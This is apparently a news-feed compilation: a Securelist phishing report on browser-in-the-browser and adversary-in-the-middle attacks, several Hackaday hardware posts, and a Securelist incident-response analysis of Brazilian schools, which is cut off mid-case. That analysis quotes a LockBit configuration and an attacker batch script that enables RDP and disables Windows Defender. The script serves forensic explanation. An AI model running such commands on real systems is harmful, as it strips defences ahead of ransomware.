The final stage unfolded on a third page, combining adversary-in-the-middle (AitM) traffic interception with a browser-in-the-browser (BitB) UI spoofing technique. BitB attacks operate by rendering a block inside a legitimate webpage that visually mimics a native browser pop-up window.

In this case, the script hosted on the attacker’s page generated a pop-up visually identical to a native browser window, complete with window controls and a spoofed address bar showing a trusted Microsoft URL. Within this simulated window, an iframe loaded the authentic login interface, routed dynamically through the service worker reverse proxy created in Stage 2. When the victim entered their credentials and MFA code into the BitB window, the proxy script intercepted both the credentials and the session tokens. Combining BitB with AitM significantly increases the threat: BitB provides a convincing, trusted visual wrapper (displaying a legitimate URL and branding), while the hidden AitM proxy quietly handles traffic interception and session hijacking behind the scenes.

Upon successful login, the proxy instructs the interface to close the pop-up and redirect the victim to a generic system error page, such as SessionExpired. This minimizes suspicion: the victim assumes a technical glitch occurred and attempts to log in again, unaware that the attacker already has full access to the session.

Cloud platform phishing attack statistics


We analyzed phishing URLs hosted across popular cloud platforms – including Cloudflare, Netlify, and GitHub Pages – over a 12-month period spanning August 2025 to July 2026. The data below outlines trends in unique third-level domains exploited to deliver phishing content. In total, our security solutions blocked 224,984 unique third-level domains on cloud and decentralized services used in phishing attacks within that timeframe.

Number of unique third-level domains
(download)

Based on this telemetry, we compiled a list of the TOP 10 cloud domains most frequently abused in phishing campaigns over the specified period.


Number of phishing links

Unsurprisingly, Cloudflare and Vercel emerged as the undisputed leaders: both offer free tiers, automated SSL certificate issuance, and global CDNs. GitHub Pages ranked third. The widespread legitimate use of the github.io domain complicates bulk blocking efforts, as security teams risk limiting access to non-malicious projects.

Decentralized networks also warrant close attention – we posted on this subject in 2023. The ipfs.io and dweb.link domains function as IPFS gateways. The principal risk associated with these platforms is content persistence: even if a specific gateway gets blocked, the phishing page remains accessible via alternative nodes across the network.

The visual website builders Wix and Webflow also ranked among the TOP 10 (eighth and ninth, respectively). These platforms allow low-skilled individuals to build phishing pages rapidly without advanced coding expertise, which significantly lowers the barrier to entry for less capable malicious actors.

DomainNumber of phishing linksPlatform
1pages.dev24.9%Cloudflare Pages
2vercel.app13.8%Vercel
3github.io13.7%GitHub Pages
4netlify.app10.0%Netlify
5dweb.link7.8%IPFS gateway
6ipfs.io5.3%IPFS (InterPlanetary File System)
7workers.dev2.5%Cloudflare Workers
8wixstudio.com1.9%Wix Studio
9webflow.io1.0%Webflow
10azurewebsites.net1.0%Microsoft Azure
Other17.9%

In total, we identified and neutralized over 390,000 phishing pages hosted across legitimate cloud platforms and decentralized networks (IPFS) over the past 12 months. This data confirms that threat actors actively exploit the implicit trust associated with legitimate PaaS providers (such as Cloudflare Workers, Vercel, Netlify, and GitHub Pages) and IPFS gateways. High domain reputation, generous free tiers, and built-in evasion capabilities enable phishers to deploy multi-stage AitM attacks designed to hijack MFA sessions.

Recommendations


Traditional security controls, such as relying on HTTPS lock icons or reputation-based domain denylists, are inadequate against these attacks. The cloud provider’s apex domain maintains a positive reputation score, while attackers generate malicious subdomains programmatically and at scale.

Effective defense against these threats calls for a layered security posture:

  • Exercise caution with unexpected requests, even if they are served from reputable domains or secured with valid SSL/TLS certificates.
  • Treat any CAPTCHA interface requiring personal data input as a possible scam. Legitimate CAPTCHA challenges rarely request personally identifiable information, such as email addresses.
  • Inspect the URL in the address bar at the very top of the browser window. In BitB attacks, threat actors can render a fake browser pop-up displaying any target URL, even a legitimate one. However, the true address bar – located at the top of the main browser window alongside native navigation controls (Back, Forward, Refresh) – will continue to display the actual attacker-controlled domain.
  • Avoid entering credentials in pop-ups you did not expect to see. If a login or MFA form appears without your explicit action, close the tab immediately. Navigate to the intended service manually by entering its address directly into the browser.
  • Additional protection can be provided by Kaspersky Secure Mail Gateway for enterprise environments and Kaspersky Premium for personal correspondence. These robust email security solutions neutralize phishing links at the delivery stage before they reach the inbox.

securelist.com/cloud-platforms…


Testing Hundreds of Used LFP Cells Requires Some Automation


The media in this post is not displayed to visitors. To view it, please log in.

Although Li-ion cells have become a lot cheaper over the years, if you wish to buy hundreds of high-quality ones for that performance go-kart project, you may feel financially pressured into going for the option of stripping down years-old commercial battery packs instead.

While this is a financially sound option, you do have to figure out what the condition is of each cell before you happily stuff them into a new battery pack for said go-kart, as [Within Tolerance] recently did.

This is something that can be done manually, but for the 768 lithium iron phosphate (LFP) cells that were obtained for this project that’d be quite the tedious task. Hence it was decided to instead spend that time designing a system to automate this process, capable of charging, discharging, measuring and quantifying individual cells.

You can find the resulting Cell Goblin battery tester project on GitHub, which entails a custom PCB featuring an ESP32-S2 as the brains and associated software to monitor the process on a connected PC. Fortunately the issues on the PCB that are described in the video are claimed to be fixed in the repository version.

Using five of these dual-cell cell testers it was possible to run through the hundreds of cells with ten cells at a time. An internal resistance meter was also wired into the PC-based software via its UART. As of publication of the video the testing was still in progress, which gives some idea of how long it takes to work through those cells.

youtube.com/embed/NCjXZjViC6E?…


hackaday.com/2026/08/04/testin…


Yellow YAG Produces Powerful Pulses in Les’ Leftover Laser


The media in this post is not displayed to visitors. To view it, please log in.

[Les] likes lasing lasers, and who doesn’t? [Les] likes larger lasers than lots of folks, with his current project being an Nd:YAG (that’s Neodymium:Yttrium Aluminum Garnet) flash pumped laser intended for tattoo removal. Like most of its ilk, the YAG crystal at the heart of that device is a rosy purple color, so when [Les] spotted a Yellow YAG with different doping promising powerful pulses, he purchased it promptly.

Specifically, the retailer was claiming a 30-50% efficiency increase for this yellow rod, thanks to cerium doping. It’s still considered an Nd:YAG, though you can label it as an Nd:Ce:YAG for clarity. The efficiency gain comes from the cerium atom taking unused energy from the flashbulb pulse — which is much broader-wavelength than the thin absorption line of the Nd ions in the rod — and giving that energy to the Nd atoms that do the lasing via fluorescence. He doesn’t try it, but reports on a paper showing these crystals can actually lase with reasonable efficiency from sunlight alone, which we’d love to see. Send us a tip if you try.

His original Nd:YAG rod produced 72.8 mJ pulses, while in the same setup with the yellow laser is peaking at 153 mJ, more than double the original output. That’s even better than the 30-50% [Les] expected, but he reckons it is because the old YAG is, well, old. The coatings break down over time, and UV light from the flashbulbs degrades the crystals too. That’s another benefit of tossing cerium in there, as apparently it acts as sunscreen for your laser rod. It lasts longer and works better, making it a no-brainer of an upgrade.

We’ve seen [Les]’s laser-based hacking before, like this diode-laser PSU and we’re always glad to take a look with our remaining eye. We also featured his tattoo removal laser back when he started working on it, along with less-lasery projects like his crystal-growing rig.

youtube.com/embed/fp-jHYiTUVY?…


hackaday.com/2026/08/04/yellow…


A Versatile PDP-11/70 Emulator


The media in this post is not displayed to visitors. To view it, please log in.

The PDP-11 was a 16-bit minicomputer that was very influential in its time. That’s what inspired [vanheusden] to start working on an emulator for the machine in 2018, which has since been developed to run on a wide variety of platforms.

The emulator, named “Kek,” is quite capable, able to run Unix 5 up to an d including Unix 7 in multi-user mode, along with BSD 2.11 Unix depending on what it’s running on. It also supports classic hardware like RK05, RL02, RP06, and RP07 disks, the KW11-L line time clock, and the DC-11 serial line interface. The emulator can also run on a wide variety of platforms. It’s possible to run it on a standard Linux machine if so desired, or you can run it on BSD, MacOS, or Windows if so desired. Beyond that, you can even get it going on a Teensy 4.1 or an ESP32 if that’s more your jam. Modern microcontrollers are just that powerful that emulating a PDP-11/70 just isn’t a challenge anymore.

We love seeing old machines emulated and brought back to life. It’s funny to see how often it’s done on microcontrollers instead of full-scale PCs these days, too. Video after the break.

youtube.com/embed/6bbowY5vlmQ?…


hackaday.com/2026/08/03/a-vers…


Sketching Temporary Circuits with a Light-Triggered Floquet Topological Insulator


The media in this post is not displayed to visitors. To view it, please log in.

In semiconductor technology, a base material like silicon is permanently modified to induce certain electrical behavior. In comparison a topological insulator material could be used to create temporary circuits using something like light exposure. An example of this is the Floquet topological state, which has long been theorized, but is now claimed to have been demonstrated in SnTe semiconductor material, per a paper by [F. Chassot] et al. in Nature Physics.

The concept of topological insulators was first proposed in 1985, but proving their existence was hard. Recently photonic Floquet topological insulators (PFTIs) have gained interest, with experiments by [Qian Ma] et al. in 2025 as well as other teams confirming aspects of the theory.

This recent publication by [Chassot] et al. would thus confirm that optical control of topological insulators is thus possible. At the core of this effect is the band inversion that results from the light pulses, with the change in conduction being very brief, essentially for as long as the femtosecond pulses were maintained.

Although still very much in the fundamental research phase, the research on these electronic topological insulators offers an interesting look at potential new technologies, much like the field of photonic topological insulators does for photonics.


hackaday.com/2026/08/03/sketch…


Energizing a Vacuum Tube Flip-Flop Module of the IBM 604


The media in this post is not displayed to visitors. To view it, please log in.


Reverse-engineered schematic of the IBM 604's TR-3 module. (Credit: Ken Shirriff)Reverse-engineered schematic of the IBM 604’s TR-3 module. (Credit: Ken Shirriff)
Taking a break from ogling microscopic features in Intel’s semiconductor processors, [Ken Shirriff] is back to instead poking at decidedly macroscopic pluggable modules from the 1948 IBM 604 Electronic Calculator. This time around it’s one of the so-called trigger modules in the form of the TR-3, which uses a flip-flop circuit to implement the timing signals and pulses that made the 604 work.

This differs from the thyratron module that we covered previously. A thyratron is a high current switch and rectifier, which is useful more for the periphery of the computer system. These TR-3s on the other hand were used to implement the basic logic circuits, even if a flip-flop by itself seems rather boring, being just a circuit that toggles between two states.

In this TR-3 module we find a 2033 dual triode design which thus increases density by having the two inverters of the flip-flop in the same tube. The rest of the module is taken up by the requisite capacitors and resistors that complete the circuit. After wiring up this original module, [Ken] was able to make it trigger somewhat reliably, requiring a stable input trigger.

Notable is that in the IBM 650 from 1954 this flip-flop circuit was abandoned in favor of one based on diode logic, presumably to use more reliable Boolean logic instead of the much fussier analog interactions. Naturally, in the first transistorized computers the use of diode-transistor logic (DTL) was exceedingly common, so this makes a lot of sense.

youtube.com/embed/KaAv1yJ30PU?…


hackaday.com/2026/08/03/energi…


Circuit Bending, But Make It MIDI


The media in this post is not displayed to visitors. To view it, please log in.

Circuit bending is a chaotic art. At its simplest, it can just involve making connections between random points on a circuit board to create weird sounds in musical hardware. Or, you can complicate things, get really specific with your hookups, and twist them with various sorts of modulation. [Simon the Magpie] has been working on something closer to the latter category, with his neat project to add MIDI to the circuit bending world.

The concept is straightforward enough. [Simon] has created a device that you place in line with your circuit bent connections, particularly those that create pitch bends with pots thanks to their variable resistance. You can then play your MIDI keyboard, and the device will vary the resistance in the circuit and bend the pitch at your command. [Simon] simply calls the device MIDI TO RESISTANCE, because that’s… precisely what it does, with the aid of a digital potentiometer. He then demonstrates it doing its thing on pitchbent toys, and it sounds pretty radical in use.

If you’re trying to make your circuit bent toys and instruments more musical, this build should serve as a great inspiration. We’ve featured other oddball musical hacks in a similarly creative vein before, too—such as using mixers as a synthesizer in their own right. Have fun out there.

youtube.com/embed/iuE5xW97DIw?…


hackaday.com/2026/08/03/circui…


Child-Friendly Music Player Uses RFID


The media in this post is not displayed to visitors. To view it, please log in.

[David] has a young child who is clever enough to use a computer to play music, but he doesn’t quite want to hand over the mouse just yet. Thus, he set about building an electronic music player that could be operated in an altogether simpler fashion.

The build is based around an Arduino Nano — its job is to read RFID tags via an RC522 reader, with the tags themselves embedded in a series of small dolls belonging to [David]’s daughter. Upon reading the tag, the Arduino Nano chats over serial with a DFPlayer Mini module, which reads a playlist of MP3 files off of an SD card and plays them over a small 4 ohm speaker that [David] had laying around. It’s a simple build, with the components all neatly wrapped up in a handsome wooden case with a volume control and a skip button for if any one song becomes too annoying for a repeat listen.

We’ve featured other builds in this vein before, too. There’s something satisfying about a music player with such a simple interface—no delicate media to fiddle with, just pop the toy on top and get the playlist you were looking for. If you’re creating your own little musical builds at home, we’d love to see them on the tipsline.


hackaday.com/2026/08/03/child-…


Congratulations to the Frikkin Laser Winners!


The media in this post is not displayed to visitors. To view it, please log in.

Apparently you all love lasers just as much as we do. We put out a challenge to use, build, or otherwise abuse our favorite coherent light sources, and you responded. Some of the projects had been in the works for quite a while and were ridiculously polished, some were whipped together on the fly just for the contest, and we truly enjoyed both.

We only have three $150 DigiKey gift certificates to give out, though, so without further ado, we present to you…

The Winners


Our judges’ favorite project was [Jacob]’s CubeRaman, and it’s not hard to see why. A Raman spectrometer shines laser light at an object and catches the reflection, filtering all of the original laser wavelength out. What remains are photons that have interacted with electrons in the atoms that make up the target itself, and come back at a shifted wavelength. Comparing the spectrum of this Raman reflection with a database of known spectra tells you what it is made of.

This is by no means an easy project, but [Jacob]’s documentation, careful selection of parts to buy used and parts to build, coupled with a clever 3D-printed mounting system make it plausible for the home gamer. We love seeing out-of-reach science gear brought into reach, and we know we’ll be keeping an eye on this project in the future.

Next up, we had [Kyle Mayer]’s Measuring Microns with Lasers, which is a DIY laser rangefinder, but for measuring very small distances — under a centimeter — with precision. Like many laser optical rangefinders, this bounces a laser off the target and collects the light on a line sensor, using the angle at which the light returns to figure out how far the target is.

[Kyle]’s implementation uses three of these measurement heads and produces a reading that is precise down to 0.25 μm nearly 5,000 times per second. This puts it in league with devices that you have to request a quote for, so you probably don’t want to have to afford them.

And finally, an art project! [AJRussell]’s Glow Engine is a beautiful take on a familiar laser trick: shining a blue laser at glow-in-the-dark materials to leave persistent traces. Scan the laser over the phosphorescent screen, and you have something like a CRT, only in [AJ]’s case, a very very slow CRT.

The beauty here lies in the details. [AJ] chose high quality strontium aluminate for the glowing, and used high resolution encoders and the open-source SimpleFOC motor driver firmware to get the spots in the right place. Snippets of old hard drive platters make fantastic mirrors. All in all, a super implementation that we’re pretty sure looks even better in the real world.

Honorable Mentions


We always come up with a few honorable mention categories to give you all some inspiration. And it also gives us a nice excuse to feature some more sweet projects.

Lightshow


We wanted to see pretty displays of laser light. [Daniel Ross]’s Laser Oscilloscope 360 not only draws out pretty waveforms, but it does so in prime steampunk style. Both [Owen Trueblood]’s Laser Cyanotypes and [GRNCH]’s Scored: Laser Woodblock Prints flip the script, making beautiful images from lasers, but not the way we intended. Kudos.

DIY


We wanted to see what laser-involved projects you were building yourselves, from scratch. While we were shocked that we had no TEA laser entries, [Armin Bindzus]’s Versatile Laser Processing Machine more than made up for it. It’s a pulsed-laser do-everything machine that we’re absolutely jealous to see made real. And if you don’t think there’s some real laser DIY going on here, you’ve never maintained a q-switched diode pumped Nd:YAG laser.

With Remaining Eye


This was our catch-all category for doing basically anything else with lasers. It turns out that what you all mostly wanted to do was science. [Matt Venn] used a fast-rise-time laser driver to Measure the Speed of Light at Home, and got damn good results considering the 2 m baseline. [Tim] put together a 3D Printed Optical Cavity interferometer on a budget.

But it wasn’t all labcoats and pocket protectors. [WeldingRod1]’s Laser Bandsaw is basically as bad an idea as it sounds like it is. Please, please wear eye protection!

Thanks again to DigiKey for sponsoring the contest. We’re sure that our winners will find whatever they need for their next laser project.

2026 Hackaday Freaking Lasers Contest


hackaday.com/2026/08/03/congra…


New File Manager is C64’s Answer to Norton Commander


The media in this post is not displayed to visitors. To view it, please log in.

Norton was always a PC company — Norton Commander, the file manager that launched a thousand clones, was only ever available for DOS, like the rest of the company’s offerings in those days. If they’d decided to port it to the C64, though, it would likely look a lot like [retro3872809] aka [Chicken 64]’s Multi Floppy Commander with Turbo, available on GitLab.

As you might be able to see on the screen shot above or in the demo video below, the application provides an 80-column interface with a split view to show a pair of floppies side-by-side. Not that you’re limited to two floppies, however. The software is happy to swap between all the drives on the bus, to the C64’s maximum of four. All four drives will be usable since the file manager lives on a cartridge.

All drive models are supported, though not all have turbo. As a file manager, it looks like it has the normal functionality you’d expect: renaming, copying, moving and deleting files and directories. You can also launch programs or print disk listings, assuming you have a printer attached to your Commodore.

Said Commodore perhaps needn’t be vintage, as they’re selling new ones again, but if you want a disk drive you may have to fix it yourself.

youtube.com/embed/c9GbLmYIrHg?…


hackaday.com/2026/08/03/new-fi…


The 16K Display that Ate Las Vegas


The media in this post is not displayed to visitors. To view it, please log in.

You may have a 4K television. Perhaps you have even bought an 8K screen, despite the shortage of things worth watching in 8K. A 16K display is, today, a rarity. But even when those eventually become commonplace, yours probably will not cover 14,900 square meters, rise 73 meters into the air, or wrap over your head and behind your peripheral vision.

That is approximately what happens inside Sphere in Las Vegas. The venue’s interior display is quoted as having a resolution of 16K by 16K and an area of 160,000 square feet, or about 3.7 acres. Unlike most enormous movie screens, it is not illuminated by a projector. The entire surface is a direct-view LED display: an immense, curved video wall assembled from tens of thousands of smaller pieces.

After seeing The Wizard of Oz at Sphere, however, the most interesting part was not simply the screen’s size. It was how thoroughly the screen could disguise itself.

Where Did The Theater Go?


Radio City or the Sphere? (It is the Sphere; photo courtesy [DP])Before the presentation began, the auditorium appeared to have a conventional architectural ceiling. Great orange ribs curved over the seating, while ventilation grilles, suspended loudspeakers, lighting fixtures, curtains, and video monitors completed the illusion. It looked like the Radio City Music Hall’s proscenium. Then the show started — and the apparent theater completely disappeared. The speakers, the TVs, even the stage.

The obvious first conclusion was that the LED surface must be optically transparent, allowing the audience to see the real roof behind it until the pixels illuminated. That explanation was attractive because Sphere’s audio system really is installed behind the display, and the surface must allow sound through it.

It was also, apparently, wrong. The only explanation that makes sense is that the ceiling, ribs, grilles, speakers, and monitors were already being displayed by the screen. It was like a holodeck impersonating a physical theater interior. When the Oz material began, the system simply replaced one complete visual environment with another.

That’s what happens when a display fills nearly all of your useful visual field. A normal screen announces itself with a bezel, a wall, or at least a clearly visible edge. Sphere’s display extends upward and around the audience, removing many of those references. Give the image credible perspective, texture, shadows, and familiar architectural details, and the brain accepts the pixels as a room.

The same effect makes the Oz landscapes seem less like scenes displayed in front of the audience and more like places into which the auditorium has been inserted. Of course, there are more special effects. For The Wizard of Oz, there is wind and smoke, along with paper leaves, flower petals, and foam-rubber apples that fall from the sky. All of this makes it even more immersive.

youtube.com/embed/hLSEgGwswbw?…

Not Your Standard 16K Monitor


Calling it “16K” is not exactly untruthful, but potentially misleading. Consumer display resolutions normally describe a rectangular raster. A 4K UHD television has 3840 by 2160 pixels, or about 8.3 million pixels. An 8K set has four times as many, at roughly 33 million.

A literal 16,384-by-16,384 image contains about 268 million picture locations, but that’s not how Sphere is built. Sphere describes its interior display plane as 16K by 16K, but that does not mean it is equivalent to a square desktop monitor with a neat, uniformly spaced Cartesian grid. It is a custom media surface with complex curvature and geometry, driven as one enormous canvas.

Sphere says the screen reaches 240 feet high and wraps up, over, and around the audience. SACO, the company responsible for the LED technology, describes the interior as the world’s highest-resolution LED screen and says it has more than 120 times the resolution of an HDTV.

youtube.com/embed/nQB_M2GumNo?…

Published numbers vary slightly depending on the source. One source describes approximately 64,000 SACO LED tiles, while structural contractor Seele refers to approximately 65,000 LED screens or frames. The difference may be terminology, rounding, or the boundary between the LED tile and its mechanical carrier. Either way, this is clearly not a single panel that arrived in the world’s largest shipping crate, but rather was built on-site.

The surface is assembled onto a precisely engineered secondary structure. Seele says it created 839 facet units containing approximately 45,500 custom structural components. Those facets establish the overall geometry and give the LED hardware suitable mounting points while maintaining alignment across the enormous screen wall.

In other words, the apparent smooth curve is made from many accurately positioned pieces. At the intended viewing distance, the facets and individual emitters merge into a continuous image.

Feeding The Beast

Foam apples rain down on the audience during one scene.
Building the display is only half the problem. The other half is getting a quarter-billion-pixel-class image onto it up to sixty times per second without tearing, losing synchronization, or pausing while somebody clears a buffering dialog.

The public description of the playback chain resembles a broadcast plant crossed with a high-end video wall. Pre-rendered content is kept on network-attached storage and streamed to dozens of 7thSense media servers. Each server produces 4K video at 60 frames per second, with the streams distributed using the SMPTE ST 2110 professional-media-over-IP standards. Pixel processors drive the appropriate regions of the display.

Hitachi Vantara says the storage system can deliver data at up to 400 GB/s with less than five milliseconds of latency. (At least it did for Postcard from Earth; it could be capable of more, for all we know.) The material is handled using 12-bit color and uncompressed 4:4:4 chroma sampling. That does not necessarily mean every show continuously consumes the maximum quoted bandwidth, but it provides some sense of the infrastructure needed to treat the whole venue as a dependable display rather than an interesting laboratory experiment.

Content also has to be geometrically transformed for the screen. An image that looks correct on a flat monitor would be badly distorted if copied directly onto the curved surface. The production pipeline therefore needs a detailed model of the display and the audience’s relationship to it.

youtube.com/embed/VSuSN_qfB0I?…

Stretching Oz Beyond The Frame


The Wizard of Oz presents an additional problem: the 1939 film was photographed for a nearly square 1.37:1 frame. Sphere’s interior is absolutely not 1.37:1 or even close.

Simply magnifying the original would waste most of the display. Cropping it to fill the screen would remove the actors and much of the composition. Instead, Sphere Studios expanded the film’s world beyond the photographed frame, using Google AI tools along with conventional restoration, compositing, animation, and visual-effects work.

The original photography remains central to the presentation, but scenery, skies, crowds, buildings, and environmental details extend far outside the old frame. Sphere says the project used AI to enhance characters and expand scenes while attempting to preserve the performances and familiar imagery.

youtube.com/embed/1ZTEajxD6EU?…

This is more complicated than expanding a still photograph. The additions must remain temporally consistent as the camera and characters move. A tree cannot change shape from frame to frame, and a newly invented Munchkin cannot grow an extra arm whenever the model becomes distracted. The generated material also has to survive at extraordinary scale, where a small artifact can become several meters wide.

Whatever one thinks about altering a classic film, it is difficult to imagine adapting this particular source material to this particular display without reconstructing substantial portions of the unseen world.

Of course, not everyone is thrilled. If you hated colorizing black-and-white movies, this will probably set you off. Even the original Star Trek got new digital effects.

What Happens When A Pixel Dies?


With roughly 64,000 or 65,000 LED assemblies, failures are inevitable. We couldn’t find much public information about Sphere’s exact maintenance procedure, but we can infer some probable scenarios from other large LED systems. Big systems generally report power, temperature, communications, and controller faults automatically. We would imagine that Sphere can do this, too. Then, technicians can also probably display red, green, blue, white, black, and low-gray test patterns while cameras or human observers look for dead, stuck, or miscalibrated pixels.

A single failed subpixel may be invisible from most seats during moving content. A stuck-bright pixel in a dark sky would be much more conspicuous, as would an entire failed tile or data branch.

Seele says the screen structure includes 229 accessible panels, suggesting that maintenance access was designed into the system rather than left to exceptionally adventurous climbers. A failed field-replaceable assembly could be swapped, repaired on a bench, and returned to the spare inventory.

The replacement would then need calibration. LEDs from different production batches — and LEDs of different ages — do not produce precisely identical brightness or color. A technically functional replacement could appear as a visible rectangle unless the controller corrected its red, green, and blue response, gamma, and low-level output to match its neighbors.

Curiously, this may be one of the hardest features to appreciate during a show: tens of thousands of modules are working together, yet the audience perceives no modules at all.

The Screen That Pretends Not To Exist


Sphere’s specifications are impressive, but resolution alone does not explain the experience. Spread 16K pixels across a screen tens of meters high and the pixel density is far below that of a phone. The system works because the pixel pitch, viewing distance, brightness, content, architecture, and human visual system were engineered together using a lot of science.

While the Wizard of Oz was an impressive feat, we hope they’ll bring us something like 2001: A Space Odyssey. Or maybe a triple feature with shorts from Star Trek, Star Wars, and Avatar. Sure, the rights to pull that off would take a team of lawyers, but we can dream, can’t we? What movie would you like to see on a giant screen like Sphere? Or would you only see an original production? Any of you out there work behind the LED curtain?


hackaday.com/2026/08/03/the-16…


An analysis of incidents at Brazilian educational institutions


The media in this post is not displayed to visitors. To view it, please log in.


Introduction


Because of the amount of data that can be obtained and the high impact that successful attacks may have, educational institutions are frequent targets of cybercriminals. Both public and private schools and universities rely on software for managing personally identifiable information (PII) that is often insecure or insufficiently tested against known vulnerabilities. In addition, machines used by multiple people without accountability can be vulnerable to insider threats.

The complexity of academic environments amplifies this risk. Unlike corporate networks, educational institutions have to provide a network that supports students, professors, researchers, administrative staff, third-party contractors, and visitors. Each of these groups has different security requirements and access control levels, making it difficult to enforce consistent security policies. A security breach can have severe consequences since it may expose vast amounts of sensitive information, such as social security numbers (CPF in Brazil), addresses, phone numbers, and even parents’ names. Armed with this information, attackers can attempt phishing attacks and impersonate the victims in SIM swapping attacks, a common practice in Brazil.

In this article, we provide details about attacks on educational institutions in Brazil observed by our Global Emergency Response Team (GERT) since 2025. We share general statistics, common threats, initial access vectors, and the impact of such violations. Additionally, we present some interesting cases encountered by our team and the identified TTPs. Finally, we offer recommendations to help institutions protect themselves against future attacks.

Key findings and statistics


Our dataset encompasses incident response cases from January 2025 to June 2026. As the chart below shows, the majority of attacks targeted institutions in São Paulo state, Brazil’s most populous state and a significant center of economic and financial activity. We also had cases in Rio de Janeiro and Pernambuco.

Geographical distribution of incident response requests at educational institutions (download)

Of the customers who requested incident response, 60% were private institutions and 40% were public institutions.

Private and public institutions (download)

The most frequent reasons for requesting IR services were related to suspicious endpoint activities, encrypted files, and the presence of suspicious files.

Incident response request reasons (download)

High-severity incidents accounted for 40% of the total cases, while the remaining 60% were medium severity.

Distribution of incidents by severity (download)

The high-severity incidents were mainly related to ransomware attacks. Interestingly, private institutions were the most targeted by ransomware, while incidents in public institutions were mostly related to suspicious endpoint activity and privilege escalation attempts. The most common ransomware families found in our dataset were DragonForce and LockBit 3, whose builder was leaked back in 2022. By using the leaked LockBit builder with a valid privileged account, attackers can build variants capable of disabling defenses and erasing logs.

The most common initial access vectors included the use of valid accounts, exploitation of public-facing applications, and insiders.

Initial access vectors (download)

For privilege escalation, the attackers often relied on Potato variants (GodPotato, SweetPotato, and BadPotato).

We also observed attackers using tools like AnyDesk for remote access, PsExec for lateral movement within compromised infrastructures, and AV-killer malware to terminate the system’s defenses. The latter was mainly used in ransomware-related incidents.

These data reveal an interesting pattern in the threat landscape affecting educational institutions in the region. Many incidents were not caused by highly sophisticated techniques but rather by the abuse of common weaknesses such as valid accounts, exposed applications, and inadequate patch management, as well as the use of publicly available tools that are well-known to the adversaries. The prevalence of ransomware in private institutions suggests a stronger financial motivation, likely because attackers assume these organizations are more capable of paying for data recovery than public schools and universities.

Most attacks were discovered promptly and lasted from a few minutes to a couple of hours. However, technical incident response activities averaged 9.6 hours. This indicates that the impact caused by an incident often extends beyond the timeframe of the active attack, requiring extensive triage and analysis by the forensic investigators to fully restore operations.

One interesting fact is that we are still observing the use of Windows 10 in the infrastructures of educational institutions, even after Microsoft’s official end-of-support date of October 2025. In addition, we found that some customer organizations were using Windows Server 2016 without security patches and fixes. Using outdated and unsupported operating systems increases the attack surface of an infrastructure because attackers can exploit publicly available vulnerabilities to access vulnerable systems and expand their presence in the network. In addition, legacy operating systems may be incompatible with modern evidence collection tools, necessitating extra time and alternative procedures for forensic acquisition.

Obsolete systems in organizations (download)

Interesting cases

Case 01 – Leaked LockBit builder


In one case, we identified the use of a custom version of LockBit that was generated using the leaked builder. The ransomware was delivered to the organization’s infrastructure via a valid account that had been leaked. It encrypted the organization’s internal systems, including file servers and databases that stored student profiles and other data. There was no evidence of data exfiltration from the affected machines.

During our analysis of the LockBit sample, we were able to extract its configuration. Interestingly, it was configured without the impersonation and spreading options. This meant the attacker had to perform manual lateral movement to deploy the malware across the network.
"config": {
"settings": {
"impersonation": false,
"local_disks": true,
"network_shares": true,
"kill_processes": true,
"kill_services": true,
"set_wallpaper": true,
"self_destruct": true,
"kill_defender": true,
"wipe_freespace": true,
"psexec_netspread": false,
"gpo_netspread": false,

Further analysis revealed that the attacker used PsExec for lateral movement. By analyzing the Update Sequence Number (USN) Journal, we were able to identify .KEY files associated with PsExec that showed us the previously compromised machines used by the attacker.

After gaining access to the target machines, the adversaries deployed a batch script to disable the system’s defenses. Our analysis of this artifact showed that they had the administrative credentials to disable the EDR in place. In addition, the script enabled RDP, which gave the attackers remote access to the target. The listing below shows an excerpt of the script:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall add rule name="allow RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnRealTimeProtection /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /t REG_SZ /d "" /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{UUID}" /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f
sc stop WinDefend
sc config WinDefend start= disabled
Finally, by cross-checking the Prefetch files, we were able to identify the precise dates of PsExecSvc.exe and LBB.exe (LockBit) execution. This revealed that the attacker established the initial connection to the analyzed machine around 5:30am UTC and ran LBB.exe for the last time at 10am UTC on the same day, resulting in an activity window of approximately four hours and thirty minutes. We were able to identify the extent of the compromise and the additional machines that required network isolation for further forensic analysis, containment, and remediation.

Case 02 – DragonForce deployed via AnyDesk


In another incident, we identified a compromised user account that the adversaries used to install the AnyDesk software to enable remote access. Although the attacker erased the system logs after encrypting the victim’s files, we were able to identify the ransomware execution event via the Prefetch and Amcache.hve files, which provided us with the SHA-1 hash of the sample.

Once we obtained the SHA-1 of the malicious artifact (named by the attacker as 1.EXE), we were able to confirm that it was a DragonForce variant. Even though the lack of evidence made the analysis more difficult, this case shows that forensic investigators must be prepared to identify information that the attackers missed or left untouched.

Case 03 – Python keylogger used by an insider


The third incident illustrates how a series of bad practices enabled an insider to collect passwords from other users inside the infrastructure. First, the customer contacted us stating that a machine was exhibiting strange behavior: files containing passwords were being created. We started with triage collection on one of the affected machines.

